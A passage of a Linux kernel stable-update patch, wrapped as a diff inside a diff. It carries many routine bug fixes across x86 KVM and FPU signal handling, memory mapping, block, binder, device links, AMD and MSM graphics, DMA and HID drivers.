+@@ -129,9 +129,9 @@ static inline void cpu_svm_disable(void)
+ 		 * case, GIF must already be set, otherwise the NMI would have
+ 		 * been blocked, so just eat the fault.
+ 		 */
+-		asm_volatile_goto("1: stgi\n\t"
+-				  _ASM_EXTABLE(1b, %l[fault])
+-				  ::: "memory" : fault);
++		asm goto("1: stgi\n\t"
++			  _ASM_EXTABLE(1b, %l[fault])
++			  ::: "memory" : fault);
+ fault:
+ 		wrmsrl(MSR_EFER, efer & ~EFER_SVME);
+ 	}
+diff --git a/arch/x86/kernel/fpu/signal.c b/arch/x86/kernel/fpu/signal.c
+index 558076dbde5bf..247f2225aa9f3 100644
+--- a/arch/x86/kernel/fpu/signal.c
++++ b/arch/x86/kernel/fpu/signal.c
+@@ -274,12 +274,13 @@ static int __restore_fpregs_from_user(void __user *buf, u64 ufeatures,
+  * Attempt to restore the FPU registers directly from user memory.
+  * Pagefaults are handled and any errors returned are fatal.
+  */
+-static bool restore_fpregs_from_user(void __user *buf, u64 xrestore,
+-				     bool fx_only, unsigned int size)
++static bool restore_fpregs_from_user(void __user *buf, u64 xrestore, bool fx_only)
+ {
+ 	struct fpu *fpu = &current->thread.fpu;
+ 	int ret;
+ 
++	/* Restore enabled features only. */
++	xrestore &= fpu->fpstate->user_xfeatures;
+ retry:
+ 	fpregs_lock();
+ 	/* Ensure that XFD is up to date */
+@@ -309,7 +310,7 @@ static bool restore_fpregs_from_user(void __user *buf, u64 xrestore,
+ 		if (ret != X86_TRAP_PF)
+ 			return false;
+ 
+-		if (!fault_in_readable(buf, size))
++		if (!fault_in_readable(buf, fpu->fpstate->user_size))
+ 			goto retry;
+ 		return false;
+ 	}
+@@ -339,7 +340,6 @@ static bool __fpu_restore_sig(void __user *buf, void __user *buf_fx,
+ 	struct user_i387_ia32_struct env;
+ 	bool success, fx_only = false;
+ 	union fpregs_state *fpregs;
+-	unsigned int state_size;
+ 	u64 user_xfeatures = 0;
+ 
+ 	if (use_xsave()) {
+@@ -349,17 +349,14 @@ static bool __fpu_restore_sig(void __user *buf, void __user *buf_fx,
+ 			return false;
+ 
+ 		fx_only = !fx_sw_user.magic1;
+-		state_size = fx_sw_user.xstate_size;
+ 		user_xfeatures = fx_sw_user.xfeatures;
+ 	} else {
+ 		user_xfeatures = XFEATURE_MASK_FPSSE;
+-		state_size = fpu->fpstate->user_size;
+ 	}
+ 
+ 	if (likely(!ia32_fxstate)) {
+ 		/* Restore the FPU registers directly from user memory. */
+-		return restore_fpregs_from_user(buf_fx, user_xfeatures, fx_only,
+-						state_size);
++		return restore_fpregs_from_user(buf_fx, user_xfeatures, fx_only);
+ 	}
+ 
+ 	/*
+diff --git a/arch/x86/kvm/svm/svm_ops.h b/arch/x86/kvm/svm/svm_ops.h
+index 36c8af87a707a..4e725854c63a1 100644
+--- a/arch/x86/kvm/svm/svm_ops.h
++++ b/arch/x86/kvm/svm/svm_ops.h
+@@ -8,7 +8,7 @@
+ 
+ #define svm_asm(insn, clobber...)				\
+ do {								\
+-	asm_volatile_goto("1: " __stringify(insn) "\n\t"	\
++	asm goto("1: " __stringify(insn) "\n\t"	\
+ 			  _ASM_EXTABLE(1b, %l[fault])		\
+ 			  ::: clobber : fault);			\
+ 	return;							\
+@@ -18,7 +18,7 @@ fault:								\
+ 
+ #define svm_asm1(insn, op1, clobber...)				\
+ do {								\
+-	asm_volatile_goto("1: "  __stringify(insn) " %0\n\t"	\
++	asm goto("1: "  __stringify(insn) " %0\n\t"	\
+ 			  _ASM_EXTABLE(1b, %l[fault])		\
+ 			  :: op1 : clobber : fault);		\
+ 	return;							\
+@@ -28,7 +28,7 @@ fault:								\
+ 
+ #define svm_asm2(insn, op1, op2, clobber...)				\
+ do {									\
+-	asm_volatile_goto("1: "  __stringify(insn) " %1, %0\n\t"	\
++	asm goto("1: "  __stringify(insn) " %1, %0\n\t"	\
+ 			  _ASM_EXTABLE(1b, %l[fault])			\
+ 			  :: op1, op2 : clobber : fault);		\
+ 	return;								\
+diff --git a/arch/x86/kvm/vmx/pmu_intel.c b/arch/x86/kvm/vmx/pmu_intel.c
+index 9a75a0d5deae1..220cdbe1e286e 100644
+--- a/arch/x86/kvm/vmx/pmu_intel.c
++++ b/arch/x86/kvm/vmx/pmu_intel.c
+@@ -38,7 +38,7 @@ static int fixed_pmc_events[] = {1, 0, 7};
+ static void reprogram_fixed_counters(struct kvm_pmu *pmu, u64 data)
+ {
+ 	struct kvm_pmc *pmc;
+-	u8 old_fixed_ctr_ctrl = pmu->fixed_ctr_ctrl;
++	u64 old_fixed_ctr_ctrl = pmu->fixed_ctr_ctrl;
+ 	int i;
+ 
+ 	pmu->fixed_ctr_ctrl = data;
+diff --git a/arch/x86/kvm/vmx/vmx.c b/arch/x86/kvm/vmx/vmx.c
+index 98d732b9418f1..57c1374fdfd49 100644
+--- a/arch/x86/kvm/vmx/vmx.c
++++ b/arch/x86/kvm/vmx/vmx.c
+@@ -2469,10 +2469,10 @@ static int kvm_cpu_vmxon(u64 vmxon_pointer)
+ 
+ 	cr4_set_bits(X86_CR4_VMXE);
+ 
+-	asm_volatile_goto("1: vmxon %[vmxon_pointer]\n\t"
+-			  _ASM_EXTABLE(1b, %l[fault])
+-			  : : [vmxon_pointer] "m"(vmxon_pointer)
+-			  : : fault);
++	asm goto("1: vmxon %[vmxon_pointer]\n\t"
++		  _ASM_EXTABLE(1b, %l[fault])
++		  : : [vmxon_pointer] "m"(vmxon_pointer)
++		  : : fault);
+ 	return 0;
+ 
+ fault:
+diff --git a/arch/x86/kvm/vmx/vmx_ops.h b/arch/x86/kvm/vmx/vmx_ops.h
+index ec268df83ed67..5edab28dfb2ef 100644
+--- a/arch/x86/kvm/vmx/vmx_ops.h
++++ b/arch/x86/kvm/vmx/vmx_ops.h
+@@ -73,7 +73,7 @@ static __always_inline unsigned long __vmcs_readl(unsigned long field)
+ 
+ #ifdef CONFIG_CC_HAS_ASM_GOTO_OUTPUT
+ 
+-	asm_volatile_goto("1: vmread %[field], %[output]\n\t"
++	asm_goto_output("1: vmread %[field], %[output]\n\t"
+ 			  "jna %l[do_fail]\n\t"
+ 
+ 			  _ASM_EXTABLE(1b, %l[do_exception])
+@@ -166,7 +166,7 @@ static __always_inline unsigned long vmcs_readl(unsigned long field)
+ 
+ #define vmx_asm1(insn, op1, error_args...)				\
+ do {									\
+-	asm_volatile_goto("1: " __stringify(insn) " %0\n\t"		\
++	asm goto("1: " __stringify(insn) " %0\n\t"			\
+ 			  ".byte 0x2e\n\t" /* branch not taken hint */	\
+ 			  "jna %l[error]\n\t"				\
+ 			  _ASM_EXTABLE(1b, %l[fault])			\
+@@ -183,7 +183,7 @@ fault:									\
+ 
+ #define vmx_asm2(insn, op1, op2, error_args...)				\
+ do {									\
+-	asm_volatile_goto("1: "  __stringify(insn) " %1, %0\n\t"	\
++	asm goto("1: "  __stringify(insn) " %1, %0\n\t"			\
+ 			  ".byte 0x2e\n\t" /* branch not taken hint */	\
+ 			  "jna %l[error]\n\t"				\
+ 			  _ASM_EXTABLE(1b, %l[fault])			\
+diff --git a/arch/x86/mm/ident_map.c b/arch/x86/mm/ident_map.c
+index 968d7005f4a72..f50cc210a9818 100644
+--- a/arch/x86/mm/ident_map.c
++++ b/arch/x86/mm/ident_map.c
+@@ -26,18 +26,31 @@ static int ident_pud_init(struct x86_mapping_info *info, pud_t *pud_page,
+ 	for (; addr < end; addr = next) {
+ 		pud_t *pud = pud_page + pud_index(addr);
+ 		pmd_t *pmd;
++		bool use_gbpage;
+ 
+ 		next = (addr & PUD_MASK) + PUD_SIZE;
+ 		if (next > end)
+ 			next = end;
+ 
+-		if (info->direct_gbpages) {
+-			pud_t pudval;
++		/* if this is already a gbpage, this portion is already mapped */
++		if (pud_large(*pud))
++			continue;
++
++		/* Is using a gbpage allowed? */
++		use_gbpage = info->direct_gbpages;
+ 
+-			if (pud_present(*pud))
+-				continue;
++		/* Don't use gbpage if it maps more than the requested region. */
++		/* at the begining: */
++		use_gbpage &= ((addr & ~PUD_MASK) == 0);
++		/* ... or at the end: */
++		use_gbpage &= ((next & ~PUD_MASK) == 0);
++
++		/* Never overwrite existing mappings */
++		use_gbpage &= !pud_present(*pud);
++
++		if (use_gbpage) {
++			pud_t pudval;
+ 
+-			addr &= PUD_MASK;
+ 			pudval = __pud((addr - info->offset) | info->page_flag);
+ 			set_pud(pud, pudval);
+ 			continue;
+diff --git a/arch/xtensa/include/asm/jump_label.h b/arch/xtensa/include/asm/jump_label.h
+index c812bf85021c0..46c8596259d2d 100644
+--- a/arch/xtensa/include/asm/jump_label.h
++++ b/arch/xtensa/include/asm/jump_label.h
+@@ -13,7 +13,7 @@
+ static __always_inline bool arch_static_branch(struct static_key *key,
+ 					       bool branch)
+ {
+-	asm_volatile_goto("1:\n\t"
++	asm goto("1:\n\t"
+ 			  "_nop\n\t"
+ 			  ".pushsection __jump_table,  \"aw\"\n\t"
+ 			  ".word 1b, %l[l_yes], %c0\n\t"
+@@ -38,7 +38,7 @@ static __always_inline bool arch_static_branch_jump(struct static_key *key,
+ 	 * make it reachable and wrap both into a no-transform block
+ 	 * to avoid any assembler interference with this.
+ 	 */
+-	asm_volatile_goto("1:\n\t"
++	asm goto("1:\n\t"
+ 			  ".begin no-transform\n\t"
+ 			  "_j %l[l_yes]\n\t"
+ 			  "2:\n\t"
+diff --git a/block/blk-mq.c b/block/blk-mq.c
+index c07e5eebcbd85..7ed6b9469f979 100644
+--- a/block/blk-mq.c
++++ b/block/blk-mq.c
+@@ -747,11 +747,16 @@ static void req_bio_endio(struct request *rq, struct bio *bio,
+ 		/*
+ 		 * Partial zone append completions cannot be supported as the
+ 		 * BIO fragments may end up not being written sequentially.
++		 * For such case, force the completed nbytes to be equal to
++		 * the BIO size so that bio_advance() sets the BIO remaining
++		 * size to 0 and we end up calling bio_endio() before returning.
+ 		 */
+-		if (bio->bi_iter.bi_size != nbytes)
++		if (bio->bi_iter.bi_size != nbytes) {
+ 			bio->bi_status = BLK_STS_IOERR;
+-		else
++			nbytes = bio->bi_iter.bi_size;
++		} else {
+ 			bio->bi_iter.bi_sector = rq->__sector;
++		}
+ 	}
+ 
+ 	bio_advance(bio, nbytes);
+diff --git a/drivers/android/binder.c b/drivers/android/binder.c
+index d933ef6cc65af..55cd17a13e758 100644
+--- a/drivers/android/binder.c
++++ b/drivers/android/binder.c
+@@ -477,6 +477,16 @@ binder_enqueue_thread_work_ilocked(struct binder_thread *thread,
+ {
+ 	WARN_ON(!list_empty(&thread->waiting_thread_node));
+ 	binder_enqueue_work_ilocked(work, &thread->todo);
++
++	/* (e)poll-based threads require an explicit wakeup signal when
++	 * queuing their own work; they rely on these events to consume
++	 * messages without I/O block. Without it, threads risk waiting
++	 * indefinitely without handling the work.
++	 */
++	if (thread->looper & BINDER_LOOPER_STATE_POLL &&
++	    thread->pid == current->pid && !thread->process_todo)
++		wake_up_interruptible_sync(&thread->wait);
++
+ 	thread->process_todo = true;
+ }
+ 
+diff --git a/drivers/base/core.c b/drivers/base/core.c
+index af90bfb0cc3d8..3078f44dc1861 100644
+--- a/drivers/base/core.c
++++ b/drivers/base/core.c
+@@ -337,10 +337,12 @@ static bool device_is_ancestor(struct device *dev, struct device *target)
+ 	return false;
+ }
+ 
++#define DL_MARKER_FLAGS		(DL_FLAG_INFERRED | \
++				 DL_FLAG_CYCLE | \
++				 DL_FLAG_MANAGED)
+ static inline bool device_link_flag_is_sync_state_only(u32 flags)
+ {
+-	return (flags & ~(DL_FLAG_INFERRED | DL_FLAG_CYCLE)) ==
+-		(DL_FLAG_SYNC_STATE_ONLY | DL_FLAG_MANAGED);
++	return (flags & ~DL_MARKER_FLAGS) == DL_FLAG_SYNC_STATE_ONLY;
+ }
+ 
+ /**
+@@ -2054,9 +2056,14 @@ static int fw_devlink_create_devlink(struct device *con,
+ 
+ 	/*
+ 	 * SYNC_STATE_ONLY device links don't block probing and supports cycles.
+-	 * So cycle detection isn't necessary and shouldn't be done.
++	 * So, one might expect that cycle detection isn't necessary for them.
++	 * However, if the device link was marked as SYNC_STATE_ONLY because
++	 * it's part of a cycle, then we still need to do cycle detection. This
++	 * is because the consumer and supplier might be part of multiple cycles
++	 * and we need to detect all those cycles.
+ 	 */
+-	if (!(flags & DL_FLAG_SYNC_STATE_ONLY)) {
++	if (!device_link_flag_is_sync_state_only(flags) ||
++	    flags & DL_FLAG_CYCLE) {
+ 		device_links_write_lock();
+ 		if (__fw_devlink_relax_cycles(con, sup_handle)) {
+ 			__fwnode_link_cycle(link);
+diff --git a/drivers/base/power/domain.c b/drivers/base/power/domain.c
+index 56ceba4698024..d238b47f74c34 100644
+--- a/drivers/base/power/domain.c
++++ b/drivers/base/power/domain.c
+@@ -1052,7 +1052,7 @@ static int __init genpd_power_off_unused(void)
+ 
+ 	return 0;
+ }
+-late_initcall(genpd_power_off_unused);
++late_initcall_sync(genpd_power_off_unused);
+ 
+ #ifdef CONFIG_PM_SLEEP
+ 
+diff --git a/drivers/bus/moxtet.c b/drivers/bus/moxtet.c
+index 5eb0fe73ddc45..79fc96c8d8364 100644
+--- a/drivers/bus/moxtet.c
++++ b/drivers/bus/moxtet.c
+@@ -830,6 +830,12 @@ static void moxtet_remove(struct spi_device *spi)
+ 	mutex_destroy(&moxtet->lock);
+ }
+ 
++static const struct spi_device_id moxtet_spi_ids[] = {
++	{ "moxtet" },
++	{ },
++};
++MODULE_DEVICE_TABLE(spi, moxtet_spi_ids);
++
+ static const struct of_device_id moxtet_dt_ids[] = {
+ 	{ .compatible = "cznic,moxtet" },
+ 	{},
+@@ -841,6 +847,7 @@ static struct spi_driver moxtet_spi_driver = {
+ 		.name		= "moxtet",
+ 		.of_match_table = moxtet_dt_ids,
+ 	},
++	.id_table	= moxtet_spi_ids,
+ 	.probe		= moxtet_probe,
+ 	.remove		= moxtet_remove,
+ };
+diff --git a/drivers/crypto/ccp/sev-dev.c b/drivers/crypto/ccp/sev-dev.c
+index b8e02c3a19610..bbfb0f288dc35 100644
+--- a/drivers/crypto/ccp/sev-dev.c
++++ b/drivers/crypto/ccp/sev-dev.c
+@@ -515,10 +515,16 @@ EXPORT_SYMBOL_GPL(sev_platform_init);
+ 
+ static int __sev_platform_shutdown_locked(int *error)
+ {
+-	struct sev_device *sev = psp_master->sev_data;
++	struct psp_device *psp = psp_master;
++	struct sev_device *sev;
+ 	int ret;
+ 
+-	if (!sev || sev->state == SEV_STATE_UNINIT)
++	if (!psp || !psp->sev_data)
++		return 0;
++
++	sev = psp->sev_data;
++
++	if (sev->state == SEV_STATE_UNINIT)
+ 		return 0;
+ 
+ 	ret = __sev_do_cmd_locked(SEV_CMD_SHUTDOWN, NULL, error);
+diff --git a/drivers/dma/ioat/dma.c b/drivers/dma/ioat/dma.c
+index e2070df6cad28..0b846c605d4bd 100644
+--- a/drivers/dma/ioat/dma.c
++++ b/drivers/dma/ioat/dma.c
+@@ -584,11 +584,11 @@ desc_get_errstat(struct ioatdma_chan *ioat_chan, struct ioat_ring_ent *desc)
+ }
+ 
+ /**
+- * __cleanup - reclaim used descriptors
++ * __ioat_cleanup - reclaim used descriptors
+  * @ioat_chan: channel (ring) to clean
+  * @phys_complete: zeroed (or not) completion address (from status)
+  */
+-static void __cleanup(struct ioatdma_chan *ioat_chan, dma_addr_t phys_complete)
++static void __ioat_cleanup(struct ioatdma_chan *ioat_chan, dma_addr_t phys_complete)
+ {
+ 	struct ioatdma_device *ioat_dma = ioat_chan->ioat_dma;
+ 	struct ioat_ring_ent *desc;
+@@ -675,7 +675,7 @@ static void ioat_cleanup(struct ioatdma_chan *ioat_chan)
+ 	spin_lock_bh(&ioat_chan->cleanup_lock);
+ 
+ 	if (ioat_cleanup_preamble(ioat_chan, &phys_complete))
+-		__cleanup(ioat_chan, phys_complete);
++		__ioat_cleanup(ioat_chan, phys_complete);
+ 
+ 	if (is_ioat_halted(*ioat_chan->completion)) {
+ 		u32 chanerr = readl(ioat_chan->reg_base + IOAT_CHANERR_OFFSET);
+@@ -712,7 +712,7 @@ static void ioat_restart_channel(struct ioatdma_chan *ioat_chan)
+ 
+ 	ioat_quiesce(ioat_chan, 0);
+ 	if (ioat_cleanup_preamble(ioat_chan, &phys_complete))
+-		__cleanup(ioat_chan, phys_complete);
++		__ioat_cleanup(ioat_chan, phys_complete);
+ 
+ 	__ioat_restart_chan(ioat_chan);
+ }
+@@ -786,7 +786,7 @@ static void ioat_eh(struct ioatdma_chan *ioat_chan)
+ 
+ 	/* cleanup so tail points to descriptor that caused the error */
+ 	if (ioat_cleanup_preamble(ioat_chan, &phys_complete))
+-		__cleanup(ioat_chan, phys_complete);
++		__ioat_cleanup(ioat_chan, phys_complete);
+ 
+ 	chanerr = readl(ioat_chan->reg_base + IOAT_CHANERR_OFFSET);
+ 	pci_read_config_dword(pdev, IOAT_PCI_CHANERR_INT_OFFSET, &chanerr_int);
+@@ -943,7 +943,7 @@ void ioat_timer_event(struct timer_list *t)
+ 		/* timer restarted in ioat_cleanup_preamble
+ 		 * and IOAT_COMPLETION_ACK cleared
+ 		 */
+-		__cleanup(ioat_chan, phys_complete);
++		__ioat_cleanup(ioat_chan, phys_complete);
+ 		goto unlock_out;
+ 	}
+ 
+diff --git a/drivers/firewire/core-device.c b/drivers/firewire/core-device.c
+index 74bab06283b71..1879ec27c0236 100644
+--- a/drivers/firewire/core-device.c
++++ b/drivers/firewire/core-device.c
+@@ -100,10 +100,9 @@ static int textual_leaf_to_string(const u32 *block, char *buf, size_t size)
+  * @buf:	where to put the string
+  * @size:	size of @buf, in bytes
+  *
+- * The string is taken from a minimal ASCII text descriptor leaf after
+- * the immediate entry with @key.  The string is zero-terminated.
+- * An overlong string is silently truncated such that it and the
+- * zero byte fit into @size.
++ * The string is taken from a minimal ASCII text descriptor leaf just after the entry with the
++ * @key. The string is zero-terminated. An overlong string is silently truncated such that it
++ * and the zero byte fit into @size.
+  *
+  * Returns strlen(buf) or a negative error code.
+  */
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index 4b91f95066eca..6a4749c0c5a58 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -4203,7 +4203,6 @@ int amdgpu_device_suspend(struct drm_device *dev, bool fbcon)
+ 		drm_fb_helper_set_suspend_unlocked(adev_to_drm(adev)->fb_helper, true);
+ 
+ 	cancel_delayed_work_sync(&adev->delayed_init_work);
+-	flush_delayed_work(&adev->gfx.gfx_off_delay_work);
+ 
+ 	amdgpu_ras_suspend(adev);
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_gfx.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_gfx.c
+index 23f0067f92e4e..b803e785d3aff 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_gfx.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_gfx.c
+@@ -585,8 +585,15 @@ void amdgpu_gfx_off_ctrl(struct amdgpu_device *adev, bool enable)
+ 
+ 		if (adev->gfx.gfx_off_req_count == 0 &&
+ 		    !adev->gfx.gfx_off_state) {
+-			schedule_delayed_work(&adev->gfx.gfx_off_delay_work,
++			/* If going to s2idle, no need to wait */
++			if (adev->in_s0ix) {
++				if (!amdgpu_dpm_set_powergating_by_smu(adev,
++						AMD_IP_BLOCK_TYPE_GFX, true))
++					adev->gfx.gfx_off_state = true;
++			} else {
++				schedule_delayed_work(&adev->gfx.gfx_off_delay_work,
+ 					      delay);
++			}
+ 		}
+ 	} else {
+ 		if (adev->gfx.gfx_off_req_count == 0) {
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index f02e509d5facb..a826c92933199 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -6001,7 +6001,9 @@ create_stream_for_sink(struct amdgpu_dm_connector *aconnector,
+ 		if (recalculate_timing) {
+ 			freesync_mode = get_highest_refresh_rate_mode(aconnector, false);
+ 			drm_mode_copy(&saved_mode, &mode);
++			saved_mode.picture_aspect_ratio = mode.picture_aspect_ratio;
+ 			drm_mode_copy(&mode, freesync_mode);
++			mode.picture_aspect_ratio = saved_mode.picture_aspect_ratio;
+ 		} else {
+ 			decide_crtc_timing_for_drm_display_mode(
+ 					&mode, preferred_mode, scale);
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/Makefile b/drivers/gpu/drm/amd/display/dc/dml/Makefile
+index ca7d240006213..6fdf87a6e240f 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/Makefile
++++ b/drivers/gpu/drm/amd/display/dc/dml/Makefile
+@@ -60,11 +60,11 @@ ifdef CONFIG_DRM_AMD_DC_DCN
+ CFLAGS_$(AMDDALPATH)/dc/dml/display_mode_vba.o := $(dml_ccflags)
+ CFLAGS_$(AMDDALPATH)/dc/dml/dcn10/dcn10_fpu.o := $(dml_ccflags)
+ CFLAGS_$(AMDDALPATH)/dc/dml/dcn20/dcn20_fpu.o := $(dml_ccflags)
+-CFLAGS_$(AMDDALPATH)/dc/dml/dcn20/display_mode_vba_20.o := $(dml_ccflags)
++CFLAGS_$(AMDDALPATH)/dc/dml/dcn20/display_mode_vba_20.o := $(dml_ccflags) $(frame_warn_flag)
+ CFLAGS_$(AMDDALPATH)/dc/dml/dcn20/display_rq_dlg_calc_20.o := $(dml_ccflags)
+-CFLAGS_$(AMDDALPATH)/dc/dml/dcn20/display_mode_vba_20v2.o := $(dml_ccflags)
++CFLAGS_$(AMDDALPATH)/dc/dml/dcn20/display_mode_vba_20v2.o := $(dml_ccflags) $(frame_warn_flag)
+ CFLAGS_$(AMDDALPATH)/dc/dml/dcn20/display_rq_dlg_calc_20v2.o := $(dml_ccflags)
+-CFLAGS_$(AMDDALPATH)/dc/dml/dcn21/display_mode_vba_21.o := $(dml_ccflags)
++CFLAGS_$(AMDDALPATH)/dc/dml/dcn21/display_mode_vba_21.o := $(dml_ccflags) $(frame_warn_flag)
+ CFLAGS_$(AMDDALPATH)/dc/dml/dcn21/display_rq_dlg_calc_21.o := $(dml_ccflags)
+ CFLAGS_$(AMDDALPATH)/dc/dml/dcn30/display_mode_vba_30.o := $(dml_ccflags) $(frame_warn_flag)
+ CFLAGS_$(AMDDALPATH)/dc/dml/dcn30/display_rq_dlg_calc_30.o := $(dml_ccflags)
+diff --git a/drivers/gpu/drm/drm_prime.c b/drivers/gpu/drm/drm_prime.c
+index eb09e86044c6d..68a6d4b0ead75 100644
+--- a/drivers/gpu/drm/drm_prime.c
++++ b/drivers/gpu/drm/drm_prime.c
+@@ -828,7 +828,7 @@ struct sg_table *drm_prime_pages_to_sg(struct drm_device *dev,
+ 	if (max_segment == 0)
+ 		max_segment = UINT_MAX;
+ 	err = sg_alloc_table_from_pages_segment(sg, pages, nr_pages, 0,
+-						nr_pages << PAGE_SHIFT,
++						(unsigned long)nr_pages << PAGE_SHIFT,
+ 						max_segment, GFP_KERNEL);
+ 	if (err) {
+ 		kfree(sg);
+diff --git a/drivers/gpu/drm/msm/msm_iommu.c b/drivers/gpu/drm/msm/msm_iommu.c
+index d12ba47b37c4f..0de3612135e96 100644
+--- a/drivers/gpu/drm/msm/msm_iommu.c
++++ b/drivers/gpu/drm/msm/msm_iommu.c
+@@ -21,6 +21,8 @@ struct msm_iommu_pagetable {
+ 	struct msm_mmu base;
+ 	struct msm_mmu *parent;
+ 	struct io_pgtable_ops *pgtbl_ops;
++	const struct iommu_flush_ops *tlb;
++	struct device *iommu_dev;
+ 	unsigned long pgsize_bitmap;	/* Bitmap of page sizes in use */
+ 	phys_addr_t ttbr;
+ 	u32 asid;
+@@ -194,11 +196,33 @@ static const struct msm_mmu_funcs pagetable_funcs = {
+ 
+ static void msm_iommu_tlb_flush_all(void *cookie)
+ {
++	struct msm_iommu_pagetable *pagetable = cookie;
++	struct adreno_smmu_priv *adreno_smmu;
++
++	if (!pm_runtime_get_if_in_use(pagetable->iommu_dev))
++		return;
++
++	adreno_smmu = dev_get_drvdata(pagetable->parent->dev);
++
++	pagetable->tlb->tlb_flush_all((void *)adreno_smmu->cookie);
++
++	pm_runtime_put_autosuspend(pagetable->iommu_dev);
+ }
+ 
+ static void msm_iommu_tlb_flush_walk(unsigned long iova, size_t size,
+ 		size_t granule, void *cookie)
+ {
++	struct msm_iommu_pagetable *pagetable = cookie;
++	struct adreno_smmu_priv *adreno_smmu;
++
++	if (!pm_runtime_get_if_in_use(pagetable->iommu_dev))
++		return;
++
++	adreno_smmu = dev_get_drvdata(pagetable->parent->dev);
++
++	pagetable->tlb->tlb_flush_walk(iova, size, granule, (void *)adreno_smmu->cookie);
++
++	pm_runtime_put_autosuspend(pagetable->iommu_dev);
+ }
+ 
+ static void msm_iommu_tlb_add_page(struct iommu_iotlb_gather *gather,
+@@ -206,7 +230,7 @@ static void msm_iommu_tlb_add_page(struct iommu_iotlb_gather *gather,
+ {
+ }
+ 
+-static const struct iommu_flush_ops null_tlb_ops = {
++static const struct iommu_flush_ops tlb_ops = {
+ 	.tlb_flush_all = msm_iommu_tlb_flush_all,
+ 	.tlb_flush_walk = msm_iommu_tlb_flush_walk,
+ 	.tlb_add_page = msm_iommu_tlb_add_page,
+@@ -254,10 +278,10 @@ struct msm_mmu *msm_iommu_pagetable_create(struct msm_mmu *parent)
+ 
+ 	/* The incoming cfg will have the TTBR1 quirk enabled */
+ 	ttbr0_cfg.quirks &= ~IO_PGTABLE_QUIRK_ARM_TTBR1;
+-	ttbr0_cfg.tlb = &null_tlb_ops;
++	ttbr0_cfg.tlb = &tlb_ops;
+ 
+ 	pagetable->pgtbl_ops = alloc_io_pgtable_ops(ARM_64_LPAE_S1,
+-		&ttbr0_cfg, iommu->domain);
++		&ttbr0_cfg, pagetable);
+ 
+ 	if (!pagetable->pgtbl_ops) {
+ 		kfree(pagetable);
+@@ -282,6 +306,8 @@ struct msm_mmu *msm_iommu_pagetable_create(struct msm_mmu *parent)
+ 
+ 	/* Needed later for TLB flush */
+ 	pagetable->parent = parent;
++	pagetable->tlb = ttbr1_cfg->tlb;
++	pagetable->iommu_dev = ttbr1_cfg->iommu_dev;
+ 	pagetable->pgsize_bitmap = ttbr0_cfg.pgsize_bitmap;
+ 	pagetable->ttbr = ttbr0_cfg.arm_lpae_s1_cfg.ttbr;
+ 
+diff --git a/drivers/gpu/drm/nouveau/nouveau_svm.c b/drivers/gpu/drm/nouveau/nouveau_svm.c
+index 31a5b81ee9fc4..be6674fb1af71 100644
+--- a/drivers/gpu/drm/nouveau/nouveau_svm.c
++++ b/drivers/gpu/drm/nouveau/nouveau_svm.c
+@@ -997,7 +997,7 @@ nouveau_svm_fault_buffer_ctor(struct nouveau_svm *svm, s32 oclass, int id)
+ 	if (ret)
+ 		return ret;
+ 
+-	buffer->fault = kvcalloc(sizeof(*buffer->fault), buffer->entries, GFP_KERNEL);
++	buffer->fault = kvcalloc(buffer->entries, sizeof(*buffer->fault), GFP_KERNEL);
+ 	if (!buffer->fault)
+ 		return -ENOMEM;
+ 
+diff --git a/drivers/gpu/drm/virtio/virtgpu_drv.c b/drivers/gpu/drm/virtio/virtgpu_drv.c
+index 0035affc3e590..9b2d235168bb6 100644
+--- a/drivers/gpu/drm/virtio/virtgpu_drv.c
++++ b/drivers/gpu/drm/virtio/virtgpu_drv.c
+@@ -93,6 +93,7 @@ static int virtio_gpu_probe(struct virtio_device *vdev)
+ 			goto err_free;
+ 	}
+ 
++	dma_set_max_seg_size(dev->dev, dma_max_mapping_size(dev->dev) ?: UINT_MAX);
+ 	ret = virtio_gpu_init(vdev, dev);
+ 	if (ret)
+ 		goto err_free;
+diff --git a/drivers/hid/i2c-hid/i2c-hid-of.c b/drivers/hid/i2c-hid/i2c-hid-of.c
+index 97a27a803f58d..6feb812fce375 100644
+--- a/drivers/hid/i2c-hid/i2c-hid-of.c
++++ b/drivers/hid/i2c-hid/i2c-hid-of.c
+@@ -80,6 +80,7 @@ static int i2c_hid_of_probe(struct i2c_client *client,
+ 	if (!ihid_of)
+ 		return -ENOMEM;
+ 
++	ihid_of->client = client;
+ 	ihid_of->ops.power_up = i2c_hid_of_power_up;
+ 	ihid_of->ops.power_down = i2c_hid_of_power_down;
+ 
+diff --git a/drivers/hid/wacom_sys.c b/drivers/hid/wacom_sys.c
+index af163e8dfec07..12d4c28741d7e 100644
+--- a/drivers/hid/wacom_sys.c
++++ b/drivers/hid/wacom_sys.c
+@@ -2080,7 +2080,7 @@ static int wacom_allocate_inputs(struct wacom *wacom)
+ 	return 0;
+ }
+ 
+-static int wacom_register_inputs(struct wacom *wacom)
++static int wacom_setup_inputs(struct wacom *wacom)
+ {
+ 	struct input_dev *pen_input_dev, *touch_input_dev, *pad_input_dev;
+ 	struct wacom_wac *wacom_wac = &(wacom->wacom_wac);
+@@ -2099,10 +2099,6 @@ static int wacom_register_inputs(struct wacom *wacom)
+ 		input_free_device(pen_input_dev);
+ 		wacom_wac->pen_input = NULL;
+ 		pen_input_dev = NULL;
+-	} else {
+-		error = input_register_device(pen_input_dev);
+-		if (error)
+-			goto fail;
+ 	}
+ 
+ 	error = wacom_setup_touch_input_capabilities(touch_input_dev, wacom_wac);
+@@ -2111,10 +2107,6 @@ static int wacom_register_inputs(struct wacom *wacom)
+ 		input_free_device(touch_input_dev);
+ 		wacom_wac->touch_input = NULL;
+ 		touch_input_dev = NULL;
+-	} else {
+-		error = input_register_device(touch_input_dev);
+-		if (error)
+-			goto fail;
+ 	}
